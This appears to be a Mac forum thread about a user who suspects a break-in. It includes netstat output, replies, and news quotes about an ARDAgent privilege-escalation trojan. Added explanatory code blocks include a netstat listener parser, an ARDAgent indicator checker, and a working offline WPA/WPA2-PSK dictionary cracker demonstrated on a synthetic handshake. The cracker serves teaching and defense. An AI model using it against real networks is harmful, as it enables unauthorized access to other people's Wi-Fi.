Munix hacked? Valid files for install of Leopard?

Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.0.1.200.49762 py-in-f83.google.http ESTABLISHED
tcp4 0 0 10.0.1.200.49756 py-in-f19.google.http ESTABLISHED
tcp4 0 0 10.0.1.200.49750 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49749 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49748 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49747 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49746 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49744 a69.26.188.50.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49743 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49741 a69.26.188.41.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49737 64.78.155.105.http ESTABLISHED
tcp4 0 0 10.0.1.200.49735 a69.26.188.58.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49723 yx-in-f164.googl.http ESTABLISHED
tcp4 0 0 10.0.1.200.49722 yx-in-f164.googl.http ESTABLISHED
tcp4 0 0 localhost.ipp *.* LISTEN
tcp6 0 0 localhost.ipp *.* LISTEN
udp4 0 0 *.* *.*
udp4 0 0 10.0.1.200.ntp *.*
udp6 0 0 thomas-lees-imac.ntp *.*
udp6 0 0 localhost.ntp *.*
udp4 0 0 localhost.ntp *.*
udp6 0 0 localhost.ntp *.*
udp6 0 0 *.ntp *.*
udp4 0 0 *.ntp *.*
udp6 0 0 *.mdns *.*
udp4 0 0 *.mdns *.*
udp4 0 0 *.* *.*
icm6 0 0 *.* *.*

These are your internet connections to the outside world. Notice that they have an address associated with them. They appear to be connected to google, and you have your network time protocol daemon running.

Nothing to worry about.

Active LOCAL (UNIX) domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
3bf1c38 stream 0 0 0 3bf1880 0 0
3bf1880 stream 0 0 0 3bf1c38 0 0
3bf1660 stream 0 0 0 3bf1990 0 0 /var/run/mDNSResponder
3bf1990 stream 0 0 0 3bf1660 0 0
3235000 stream 0 0 0 3250088 0 0
3250088 stream 0 0 0 3235000 0 0
2e62660 stream 0 0 0 32502a8 0 0
32502a8 stream 0 0 0 2e62660 0 0
3bf1d48 stream 0 0 0 3250aa0 0 0
3250aa0 stream 0 0 0 3bf1d48 0 0
3250e58 stream 0 0 0 32355d8 0 0 /var/run/usbmuxd
32355d8 stream 0 0 0 3250e58 0 0
3250b28 stream 0 0 0 3bf1b28 0 0 /var/run/mDNSResponder
3bf1b28 stream 0 0 0 3250b28 0 0
3250220 stream 0 0 0 3bf1cc0 0 0 /var/run/mDNSResponder
3bf1cc0 stream 0 0 0 3250220 0 0
32507f8 stream 0 0 0 32506e8 0 0 /var/run/mDNSResponder
32506e8 stream 0 0 0 32507f8 0 0
3235ee0 stream 0 0 0 2e624c8 0 0
2e624c8 stream 0 0 0 3235ee0 0 0
3bf1ee0 stream 0 0 0 3250198 0 0
3250198 stream 0 0 0 3bf1ee0 0 0
3bf1f68 stream 0 0 3fec400 0 0 0 /tmp/launch-T9hsEC/:0
3250110 stream 0 0 3fec520 0 0 0 /tmp/launch-T8bJ6T/Listeners
2e62b28 stream 0 0 3fec640 0 0 0 /tmp/launch-IG0YYU/Render
32505d8 stream 0 0 34c1a30 0 0 0 /tmp/launchd-165.93Pw9E/sock
3235330 stream 0 0 0 3235198 0 0
3235198 stream 0 0 0 3235330 0 0
3235110 stream 0 0 0 2e62550 0 0
2e62550 stream 0 0 0 3235110 0 0
3235f68 stream 0 0 0 3250880 0 0
3250880 stream 0 0 0 3235f68 0 0
2e62330 stream 0 0 0 3235908 0 0
3235908 stream 0 0 0 2e62330 0 0
3235770 stream 0 0 0 0 0 0
3235aa0 stream 0 0 0 2e62088 0 0
2e62088 stream 0 0 0 3235aa0 0 0
32352a8 stream 0 0 3490c20 0 0 0 /var/run/pppconfd
3250660 stream 0 0 0 3250550 0 0
3250550 stream 0 0 0 3250660 0 0
3235cc0 stream 0 0 0 3250440 0 0
3250440 stream 0 0 0 3235cc0 0 0
3250990 stream 0 0 0 3250a18 0 0
3250a18 stream 0 0 0 3250990 0 0
3250cc0 stream 0 0 0 3250d48 0 0
3250d48 stream 0 0 0 3250cc0 0 0
3250ee0 stream 0 0 0 3250f68 0 0
3250f68 stream 0 0 0 3250ee0 0 0
3235440 stream 0 0 0 32354c8 0 0
32354c8 stream 0 0 0 3235440 0 0
3235660 stream 0 0 0 32356e8 0 0
32356e8 stream 0 0 0 3235660 0 0
3235bb0 stream 0 0 0 3235c38 0 0
3235c38 stream 0 0 0 3235bb0 0 0
3235dd0 stream 0 0 0 3235e58 0 0
3235e58 stream 0 0 0 3235dd0 0 0
2e62220 stream 0 0 0 2e622a8 0 0
2e622a8 stream 0 0 0 2e62220 0 0
2e627f8 stream 0 0 0 2e62770 0 0
2e62770 stream 0 0 0 2e627f8 0 0
2e62880 stream 0 0 0 2e62990 0 0
2e62990 stream 0 0 0 2e62880 0 0
2e62a18 stream 0 0 0 2e62aa0 0 0
2e62aa0 stream 0 0 0 2e62a18 0 0
2e62c38 stream 0 0 2f570a0 0 0 0 /var/tmp/launchd/sock
2e62cc0 stream 0 0 2f571c0 0 0 0 /private/var/run/cupsd
2e62d48 stream 0 0 2f572e0 0 0 0 /var/run/usbmuxd
2e62e58 stream 0 0 2f57400 0 0 0 /var/run/asl_input
2e62f68 stream 0 0 2f57490 0 0 0 /var/run/portmap.socket
2e62ee0 stream 0 0 2f57520 0 0 0 /var/run/mDNSResponder
3bf13b8 dgram 0 0 0 3bf14c8 3bf14c8 0
3bf14c8 dgram 0 0 0 3bf13b8 3bf13b8 0
3bf1770 dgram 0 0 0 3bf17f8 3bf17f8 0
3bf17f8 dgram 0 0 0 3bf1770 3bf1770 0
3bf1bb0 dgram 0 0 0 2e62dd0 0 32503b8
3250770 dgram 0 0 0 3bf1aa0 3bf1aa0 0
3bf1aa0 dgram 0 0 0 3250770 3250770 0
3250c38 dgram 0 0 0 3235088 3235088 0
3235088 dgram 0 0 0 3250c38 3250c38 0
32357f8 dgram 0 0 0 2e62198 2e62198 0
2e62198 dgram 0 0 0 32357f8 32357f8 0
2e62bb0 dgram 0 0 0 3bf1dd0 3bf1dd0 0
3bf1dd0 dgram 0 0 0 2e62bb0 2e62bb0 0
3250000 dgram 0 0 0 3bf1e58 3bf1e58 0
3bf1e58 dgram 0 0 0 3250000 3250000 0
3235220 dgram 0 0 0 3250bb0 3250bb0 0
3250bb0 dgram 0 0 0 3235220 3235220 0
32503b8 dgram 0 0 0 2e62dd0 0 2e623b8
2e623b8 dgram 0 0 0 2e62dd0 0 3235990
3235990 dgram 0 0 0 2e62dd0 0 32353b8
3235a18 dgram 0 0 0 3235b28 3235b28 0
3235b28 dgram 0 0 0 3235a18 3235a18 0
32353b8 dgram 0 0 0 2e62dd0 0 3235550
3250dd0 dgram 0 0 0 3235880 3235880 0
3235880 dgram 0 0 0 3250dd0 3250dd0 0
3235550 dgram 0 0 0 2e62dd0 0 2e62110
2e62440 dgram 0 0 0 2e626e8 2e626e8 0
2e626e8 dgram 0 0 0 2e62440 2e62440 0
2e62110 dgram 0 0 0 2e62dd0 0 3250330
3250330 dgram 0 0 0 2e62dd0 0 2e62908
2e62908 dgram 0 0 0 2e62dd0 0 0
2e62dd0 dgram 0 0 2f57370 0 3bf1bb0 0 /var/run/syslog

Seems like an awful lot of connections to me, but then again, I am NOT a net techie.

And these are your local connections, connections that are made between programs on your machine. Sockets are how Unix programs communicate with one another. On any machine, you will find that there are hundreds if not thousands of such sockets open at any one time.

What you are seeing is perfectly normal.
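To make the interpretation above repeatable rather than eyeballed, here is an added example (not code from the thread or from anyone posting in it) that parses BSD-style `netstat -an` output such as the listing posted here and separates established connections from listening sockets, flagging any listener bound to a non-loopback address on a port other than the ones the reply calls normal (ntp, mdns). The sample input is copied from the listing above plus one constructed line, `tcp4 *.5900 LISTEN`, showing what an unexpected VNC server bound to all interfaces would look like; that line is not from the thread.

```python
"""Parse BSD-style `netstat -an` output and separate the benign from the worth-a-look."""
from collections import Counter, namedtuple

Socket = namedtuple("Socket", "proto local foreign state")

# Constructed sample: lines copied from the listing posted in the thread, plus one
# line (tcp4 *.5900 LISTEN) that is NOT from the thread and shows what a VNC server
# bound to every interface would look like.
SAMPLE = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.0.1.200.49762 py-in-f83.google.http ESTABLISHED
tcp4 0 0 10.0.1.200.49750 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49737 64.78.155.105.http ESTABLISHED
tcp4 0 0 localhost.ipp *.* LISTEN
tcp6 0 0 localhost.ipp *.* LISTEN
udp4 0 0 10.0.1.200.ntp *.*
udp4 0 0 *.ntp *.*
udp4 0 0 *.mdns *.*
udp4 0 0 *.* *.*
tcp4 0 0 *.5900 *.* LISTEN
"""

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
# Services the replies in the thread call normal to find bound to every interface.
EXPECTED_EXPOSED = frozenset({"ntp", "mdns"})


def split_endpoint(endpoint):
    """BSD netstat joins host and port with a dot: '10.0.1.200.49762' ->
    ('10.0.1.200', '49762'), '*.*' -> ('*', '*'). Split on the last dot only."""
    host, _, port = endpoint.rpartition(".")
    return host, port


def parse_netstat(text):
    """Socket records for the tcp/udp lines; headers and icm6/unix lines are skipped."""
    sockets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith(("tcp", "udp")):
            continue
        state = fields[5] if len(fields) > 5 else ""   # udp lines carry no state column
        sockets.append(Socket(fields[0], fields[3], fields[4], state))
    return sockets


def is_listener(sock):
    """TCP sockets say LISTEN; a UDP socket with no peer is effectively a listener too."""
    return sock.state == "LISTEN" or (sock.proto.startswith("udp") and sock.foreign == "*.*")


def summarize(sockets):
    """(Counter of remote hosts with ESTABLISHED connections,
        list of (proto, host, port, reachable_from_network) for listeners)."""
    established = Counter(split_endpoint(s.foreign)[0]
                          for s in sockets if s.state == "ESTABLISHED")
    listeners = []
    for s in sockets:
        if not is_listener(s):
            continue
        host, port = split_endpoint(s.local)
        if port == "*":            # unbound datagram socket: nothing can reach it yet
            continue
        listeners.append((s.proto, host, port, host not in LOOPBACK))
    return established, listeners


def warnings(sockets, expected=EXPECTED_EXPOSED):
    """Listeners reachable from the network on ports the user did not expect."""
    _, listeners = summarize(sockets)
    return [f"{proto} listener on {host}:{port} is reachable from the network"
            for proto, host, port, exposed in listeners
            if exposed and port not in expected]


if __name__ == "__main__":
    socks = parse_netstat(SAMPLE)
    established, listeners = summarize(socks)
    print("established connections by remote host:", dict(established))
    print("listeners:", listeners)
    print("warnings:", warnings(socks))
```

Run against the full listing in the thread, this prints the Google and Akamai-style HTTP peers under "established", the CUPS (`ipp`) listener as loopback-only, ntp and mdns as expected, and nothing under "warnings"; only the constructed `*.5900` line trips it. The useful habit is the split: established outbound connections tell you what the machine talked to, listeners tell you what can talk to it, and only the second list needs a "did I enable this?" answer for every entry.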
 
Of course, this exploit requires the hacker to have access to the machine (meaning they have to be sitting in front of the computer, or to have already hacked into your system), or social engineering skills high enough to trick a user into running some application.

The short answer is that for the trojan to be exploited, the user has to explicitly execute a program that takes advantage of this security hole. No current software does this -- it's just a "potential" threat. In addition, a program that DOES exploit this security hole wouldn't be masquerading as the latest FireFox download, a system update, or some pinball game... if you obtain your software from reputable sources, the likelihood of the software containing this trojan is nanometers away from nil.

Maybe we should start at the beginning with these problems and find out what's really wrong...

What abnormal operations of the system that are detrimental to using the computer are occurring?

Have you lost any data (Word files, text files, programs, etc.) due to the abnormal activity?

If you believe your system has been compromised, what have the hackers done with your system (relaying spam, deleting documents, locking you out of the system)?

If any of the above have occurred, what log entries do they coincide with?

If none of the above, could this just all be a question of understanding and interpreting cryptic log entries which seem like they're abnormal, but in fact are benign and normal?

I think it's important to remember that even though you're not clicking and typing on the computer that the computer is going to do a lot of stuff, generate a lot of log entries, do housekeeping on the filesystem, check network connections, and generate warnings and errors (which are normal and handled gracefully), among other things. Just because you don't, for example, renew a DHCP lease manually, your computer may do it for you. Just because you don't explicitly tell the computer to accept a connection from an outside source doesn't mean it's not gonna do it automatically, routinely, and normally. Just because a process is named "Remote Install Assistant" does not mean that some hacker is getting assistance installing stuff on your machine remotely.
 
I recommend that a moderator steps in and closes this thread now. We are either dealing with trolls here, or mentally unstable people. In either case, nothing we say or do is going to settle this.
 
I couldn't agree more. All that has been said to solve this problem has been said. If someone chooses to be paranoid about the processes going on in a computer (especially if those processes are perfectly normal), then let him or her wear the tinfoil hat and let's be done with it. I recommend that those in question look for some reading material on the inner workings of Unix-based operating systems and computer security, if even just for some basic understanding.

What the two posters are asking for goes beyond what this thread (or this forum for that matter) can assist with. This thread is running in circles at this point.
 

They could genuinely have a problem. A Mac one, that is...

Personally, I've never seen anything remotely like an exploit on the Mac and nothing I've seen in this thread jumps out at me and strikes me as being a potential exploit.
 

Then it's time for the original posters to get some reading materials on Mac OS X and some basic Unix-based OS concepts, as well as some basic computer security materials. Again, what's being asked goes beyond the scope of this thread and this forum, IMO.
 
I think it's important to remember that even though you're not clicking and typing on the computer that the computer is going to do a lot of stuff, generate a lot of log entries, do housekeeping on the filesystem, check network connections, and generate warnings and errors (which are normal and handled gracefully), among other things.

I think this whole incident does teach me to be really really careful with my code in the future. It tells me that as a software developer, I should *not* liberally sprinkle trace statements in my code which will be captured by the debug console. Sure, those messages only have meaning to me but they mean nothing to others and could potentially panic users should they ever choose to look at the debug log. Also, I need to write less cryptic debug messages. And choose better, more descriptive names for my processes.
 
I've firmly secured my tinfoil hat to my head and will scurry off. It's quite rude to suggest that perhaps I'm mentally unstable or a troll, but such is life.

I do thank those of you that have taken time to look over materials and provide guidance. It's appreciated.

I also find it incredible that STILL the really odd log entries are ignored for comment or explanation, yet minor notes are hyped as examples of how ignorant I am of the Unix environment.

Just WHAT was going on with the Airport Extreme base station?

The initial issues for the machine that prompted the paranoia:
- iSight comes on at will.
- File sharing preferences change over time to allow greater access to the machine.
- My admin account privileges are reduced over time. During one go round I was no longer allowed to insert a CD into the optical drive. It would be rejected with an error that I did not have the rights to perform that action.

Can't happen on a Mac, I know.

Wait what's that? I think the FBI's at the door. Gotta go.
 

Since you haven't quite left yet (as I see you still viewing the thread as of this writing), I'll take the time to answer.

I looked at your Airport log where you posted that an update to the configuration was not done by you, and it looks as though the configuration of the basestation was changing due to being synchronized through NTP so that the time would be correct. In order to take the changes, I'm guessing that the base station had to unload the currently active configuration and reload it with the updated time information from the NTP server its accessing. It seems to do this in intervals because it's probably checking it in intervals. As for that long list of parameters you say also were not done by you, I can only assume it has something to do with the type of encryption you're using on your base station. There's mention of TKIP, so I'm assuming that you're using either WPA or WPA2.

I hope that you're using a very strong password if you're not using some sort of certificate authentication as would be done using a RADIUS server (please don't ask how to set RADIUS up. Google is your friend for this). If not, then a simple dictionary attack would compromise your base station. Defense in depth is important in keeping your network secure.

I personally think that you and the other poster are making a big deal about normal processes on all your devices. Mind you I could be wrong, but from what everyone has seen and read regarding your problem there is absolutely nothing wrong. As a matter of fact, the log from your MacBook looks as though you were conducting a fresh installation and you're merely highlighting things that, while seemingly foreign to you, are perfectly normal within a Mac OS X installation. If you both are still seriously concerned about this problem, then you both need to take it to the next level and have someone examine your systems and your networks. There's no way anyone here can diagnose something this (seemingly) deep without actually being there with you. For you and NewMacUser-TX, I think it's time to get the direct, hands-on assistance from someone who specializes in computer/network security and have them perform some sort of penetration test for you. If it's that important to you, then the cost should not matter.

Nothing more can be said about this really.....every element that can possibly be done through a forum has been done.

Good luck to the both of you.
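The remark above that "a simple dictionary attack would compromise your base station" if the WPA passphrase is weak is worth seeing in code. The following is an added example, not from the thread or any poster in it: it derives the WPA/WPA2-PSK pairwise master key the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 rounds), expands it to the PTK with the handshake nonces and MAC addresses, and checks each candidate passphrase against the MIC of the second EAPOL-Key message, which is exactly what an offline cracker does with a sniffed 4-way handshake. The handshake here is synthesized: the MAC addresses, nonces and frame bytes are constructed, and the SSID `linksys`, the passphrase `dragon123` and the wordlist are made up. Nothing is captured from a real network.

```python
"""Offline dictionary attack on a WPA/WPA2-PSK 4-way handshake (synthetic capture)."""
import hashlib
import hmac
import random
from collections import namedtuple

# What a sniffer needs from the 4-way handshake: SSID, both MAC addresses, both
# nonces, message 2 with its MIC field zeroed, the MIC the client sent, and the
# key descriptor version (1 = WPA/TKIP, 2 = WPA2/CCMP).
Handshake = namedtuple("Handshake", "ssid aa spa anonce snonce frame mic version")


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    This is the only expensive step, and the salt is just the SSID, so a
    dictionary can be precomputed once per common network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range((nbytes + 19) // 20))
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key; its first 16 bytes are the KCK that signs EAPOL frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, frame: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed): HMAC-MD5 for descriptor
    version 1 (TKIP), HMAC-SHA1 truncated to 128 bits for version 2 (CCMP)."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, frame, digest).digest()[:16]


def crack(hs: Handshake, wordlist):
    """Try each candidate passphrase; a matching MIC proves the PMK and so the passphrase."""
    for tried, word in enumerate(wordlist, 1):
        kck = wpa_ptk(wpa_pmk(word, hs.ssid), hs.aa, hs.spa, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.frame, hs.version), hs.mic):
            return word, tried
    return None, len(wordlist)


def make_handshake(passphrase: str, ssid: str = "linksys", version: int = 1,
                   seed: int = 7) -> Handshake:
    """Constructed stand-in for a sniffed handshake: MACs, nonces and frame bytes
    are random but seeded, and the MIC is computed with the real passphrase
    exactly as a legitimate client would."""
    rng = random.Random(seed)

    def rb(n):
        return bytes(rng.getrandbits(8) for _ in range(n))

    aa, spa, anonce, snonce = rb(6), rb(6), rb(32), rb(32)
    frame = b"\x01\x03" + rb(93)           # EAPOL v1, type Key, then a placeholder body
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return Handshake(ssid, aa, spa, anonce, snonce, frame, eapol_mic(kck, frame, version), version)


if __name__ == "__main__":
    captured = make_handshake("dragon123")            # the base station's real passphrase
    print(crack(captured, ["password", "letmein", "dragon123", "trustno1"]))
```

Two things follow from the code. First, the attacker needs one handshake, not an online guess per attempt, so nothing on the base station rate-limits the attack; the only cost is 4096 SHA-1 rounds per candidate, which commodity hardware does by the tens of thousands per second. Second, the salt is the SSID, so a base station left on a default name like `linksys` is attackable with precomputed tables. A long random passphrase, or 802.1X with certificates as the post suggests, is what actually removes this attack. `wpa_pmk` can be checked against the test vectors in IEEE 802.11i Annex H.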
 
So, after all this...looks to me like I'm dealing with this...

Researchers spot Mac Trojan In the Wild

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9101898

"The malware exploits a recently publicized vulnerability in the Apple Remote Desktop Agent (ARDAgent), part of Tiger's and Leopard's Remote Management component. Composed as a compiled AppleScript, or in another variant, script bundled into an application, the Trojan leverages the ARDAgent bug to gain full control of the victimized Mac.

"[It] allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging," claimed SecureMac. "Additionally, the Trojan can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing."

SecureMac's warning came one day after an anonymous reader disclosed a few details of the ARDAgent vulnerability on Slashdot.org, and on the same day that rival security vendor Intego provided more information about the bug.

Malicious AppleScript, said Intego, can call ARDAgent, which then gives that script full "root" access to the system. "When an application enables a root privilege escalation of this type, any malicious code that is run may have devastating effects. These may range from deleting all the files on the Mac to more pernicious attacks such as changing system settings, and even setting up periodic tasks to perform them repeatedly," Intego's warning read."

Best to all...
 
"SecureMac, a Mac-specific anti-virus vendor, posted an alert last Thursday that its researchers had found a Trojan horse..." Well, that's what the companies that sell antivirus software do: make you scared and shed money on their software.

How do you think you had this trojan in place when the system was installed from the retail discs?
 
That exploit was already brought up twice as a possibility, and ElDiabloConCaca already responded about it above:
http://macosx.com/forums/1442876-post82.html

You also failed to mention that the reports given by those antivirus companies specify the following...

From SecureMac:
SecureMac has discovered multiple variants of a new Trojan horse in the wild that affects Mac OS X 10.4 and 10.5. The Trojan horse is currently being distributed from a hacker website, where discussion has taken place on distributing the Trojan horse through iChat and Limewire.

The Trojan horse runs hidden on the system, and allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging. Additionally, the AppleScript.THT Trojan horse can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing. The Trojan horse exploits a recently discovered vulnerability with the Apple Remote Desktop Agent, which allows it to run as root.

Seems as though this works initially by socially engineering the victim through a rogue file. Have you used anything like Limewire or accessed files from other users through iChat or some other IM client? If you want the help, then you need to honestly share more information. In my experience, most of the time, especially in the Windows world, it seems that those that have been compromised in such a way have been using Limewire to download files. I doubt it would be any different just because you're on a Mac (don't believe the marketing hype from the commercials, please....yes, I've been an Apple user since the Apple IIc). Social engineering proves one thing: no matter what system you're running, no matter how many security solutions you've put in place, there's just no patch for human stupidity. (I referred to it as the "human condition" in my previous post, but in reality it's the "human stupidity" in all of us that we need to keep in check.)
 
OMG! I have been hacked (chopped) hacked (chopped) hacked (chopped)....

(butter?.......PARKAY!!!!!!)

::evil::
 
If you believe you have been compromised by this trojan, then you would have been required to manually execute an infected application on your hard drive. This application would HAVE to have been downloaded manually, by you, from the internet (in other words, this infected application could NOT be on your system directly after a clean install, and there is no way for someone to "push" the application to you without your knowledge). You would have then had to execute this application manually.

In short, if you are indeed infected by this trojan, then you, yourself, are the one that infected yourself with it. That's social engineering, and there's nothing any anti-virus software can do about it, nor is there anything you can do to your network to prevent it. It's like ramming your head into a wall -- if you don't want a headache, don't ram your head into the wall -- you and only you are in charge of your head.

If you do seriously believe you have been compromised by this trojan, what application did you download from the internet and execute manually directly after a clean Mac OS X installation?
 
I think this whole incident does teach me to be really really careful with my code in the future. It tells me that as a software developer, I shouldn *not* liberally sprinkle trace statements in my code which will be captured by the debug console.
Heh... precisely why large software developers have "beta" software, which is usually very verbose in logging and useful to the developer, as opposed to "release" versions, which do not spit out spurious messages and are intended for end-users.
 
Was using comcast, now Verizon dsl.
One of your many log posts included some connections that were highlighted by you that included connections to IP addresses, if I am correctly remembering... doing a lookup on those IP addresses yielded information that traced back to Comcast.

I know we've beat this subject to death already, whether resolved or not, but could it be possible that your AirPort (and/or other network devices) is still configured for Comcast settings (gateways, DNS servers, etc.), even though you're using a new service from Verizon? Also, cable modems use a DHCP-style connection, while DSL uses a PPPoE-style connection, which are very different and, basically, "incompatible" for lack of a better word.

If your AirPort is still configured to connect to the Comcast network via DHCP, but you need to connect to Verizon's DSL with a PPPoE connection, then network unhappiness will occur... the results being indeterminable, but definitely problematic.


Hell, people, I'm all about continuing this discussion -- it is moving forward (however slowly), and could result in something good. If not anything, move it to a category more suited for casual discussion instead of closing it. We'll eventually prove one of two things: the posters were lying, or we helped them on a path to resolution.
 

On Windows, we have different trace logging levels. We usually have some fairly verbose logging on, since it means that if clients repeatedly run into trouble and crash we can look at their logs and understand what happened. While it sounds bad for performance, we did look at it and found that there wasn't too much of a performance increase (about 2% more on a P4 2GHz) so we left it enabled.
 
From the Washington Post today...


http://blog.washingtonpost.com/securityfix/2008/06/new_trojan_leverages_unpatched.html?nav=rss_blog

"...
Dai Zovi said the Trojan tries two different exploits to install itself without having to prompt the user for his or her system credentials. One exploit is the aforementioned ARDagent attack; the other is for a privilege escalation vulnerability that Apple patched in 2006. (As an interesting aside, Dai Zovi himself reported that latter vulnerability to Apple back in 2006, only to later learn that exploit code for that same vulnerability had been publicly posted online prior to Apple issuing a patch for the flaw).


Once installed, the Trojan drops a keystroke logger called "logkext" on the Mac user's system. It then sets up a virtual network computing (VNC) server listening on the victim's machine, which would provide an attacker remote access to the victim's computer.

The code also installs a Web-based "PHP shell" program that allows the attackers to remotely manipulate the infected machine using nothing more than a Web browser. That component of the Trojan also sets the victim's system so that it can be tracked using dynamic DNS services, which permit remote users to remain connected to a system even if its numeric Internet address changes over time. ..."
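The articles quoted in this post and the earlier one name concrete indicators rather than vague unease: ARDAgent running setuid root (the bug itself, since a root-owned setuid binary that accepts Apple Events lets any local user's AppleScript run shell commands as root), a `logkext` keylogger, a VNC server listening, and system logging switched off. The following is an added example, not from the thread or from any of the vendors cited, that checks a host for those indicators. The ARDAgent path, the `logkext` substring match and the `kextstat` column layout are assumptions about Tiger/Leopard-era systems; on anything else the filesystem and kext checks simply report nothing, and the inputs to `assess` can be fed from saved output instead.

```python
"""Check a Mac for the indicators attributed to the 2008 ARDAgent trojan."""
import os
import socket
import stat
import subprocess

# Assumption: path of the Remote Management agent binary on Tiger/Leopard.
ARDAGENT = "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"
VNC_PORT = 5900           # default listener for a VNC server
KEXT_MARKER = "logkext"   # assumption: the keylogger's bundle id contains this


def is_setuid_root(mode: int, uid: int) -> bool:
    """The root cause: a root-owned binary with the setuid bit runs as root for
    whoever can make it execute code, which is what the AppleScript did."""
    return bool(mode & stat.S_ISUID) and uid == 0


def ardagent_setuid(path: str = ARDAGENT):
    """True/False for the on-disk binary, None if it is not there (not a Mac)."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return is_setuid_root(st.st_mode, st.st_uid)


def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """TCP connect test; a VNC server the user never enabled would answer here."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def suspicious_kexts(loaded) -> list:
    """Filter a list of loaded kext bundle identifiers for the keylogger."""
    return [k for k in loaded if KEXT_MARKER in k.lower()]


def loaded_kexts() -> list:
    """Bundle ids from `kextstat` (macOS only; empty list elsewhere).
    Assumption: the bundle id is the sixth whitespace-separated column."""
    try:
        out = subprocess.run(["kextstat"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return []
    return [f[5] for f in (line.split() for line in out.splitlines()[1:]) if len(f) > 5]


def syslogd_running(ps_lines) -> bool:
    """The trojan is said to turn off system logging; look for syslogd in `ps` output."""
    return any("syslogd" in line for line in ps_lines)


def assess(ard_setuid, vnc_open, kexts, ps_lines) -> list:
    """Turn the raw observations into findings a person can act on."""
    findings = []
    if ard_setuid:
        findings.append("ARDAgent is setuid root: any local AppleScript can run commands as root")
    if vnc_open:
        findings.append(f"something is listening on TCP {VNC_PORT} (VNC)")
    for k in suspicious_kexts(kexts):
        findings.append(f"keylogger kext loaded: {k}")
    if not syslogd_running(ps_lines):
        findings.append("syslogd is not running; system logging may have been disabled")
    return findings


def run_live() -> list:
    """Gather the observations from the running host and assess them."""
    try:
        ps = subprocess.run(["ps", "-axo", "comm"], capture_output=True, text=True).stdout.splitlines()
    except OSError:
        ps = []
    return assess(ardagent_setuid(), port_open("127.0.0.1", VNC_PORT), loaded_kexts(), ps)


if __name__ == "__main__":
    for finding in run_live() or ["no indicators found"]:
        print(finding)
```

The first finding is the one to act on: the workaround that circulated before Apple's fix was simply to clear the setuid bit on ARDAgent, which removes the privilege escalation without touching anything else. The other three are after-the-fact indicators of the specific trojan; their absence does not prove a clean machine, and their presence warrants a reinstall rather than cleanup, which is the same conclusion the replies above reach by a different route.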
 